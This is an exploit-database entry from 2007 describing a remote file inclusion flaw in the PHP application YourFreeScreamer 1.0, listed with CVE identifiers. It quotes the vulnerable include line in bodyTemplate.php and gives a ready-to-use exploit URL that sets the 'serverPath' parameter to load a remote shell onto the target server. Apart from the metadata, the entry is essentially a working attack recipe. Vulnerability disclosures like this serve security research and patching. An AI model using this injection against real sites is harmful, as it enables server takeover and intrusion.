YourFreeScreamer 1.0 - 'serverPath' Remote File Inclusion

Author: Crackers_Child
type: webapps
platform: php
port: 
date_added: 2007-06-16 
date_updated:  
verified: 1 
codes: OSVDB-36891;CVE-2007-3315;CVE-2007-3271 
tags: 
aliases:  
screenshot_url:  
application_url: 

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Title    : YourFreeScreamer 1.0 Remote File Ä°nclude

Author   : Crackers_Child

Contact  : cybermilitan@hotmail.com

Bug      : in bodyTemplate.php " <? include ( $serverPath . "includes/form.php" );?> "

Down     : http://www.yfma.com/count/click.php?id=1
Site	 : http://yfma.com/yfs/

Exploit  : http://site.com/script_path/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ?

Note     : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda]

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

# milw0rm.com [2007-06-17]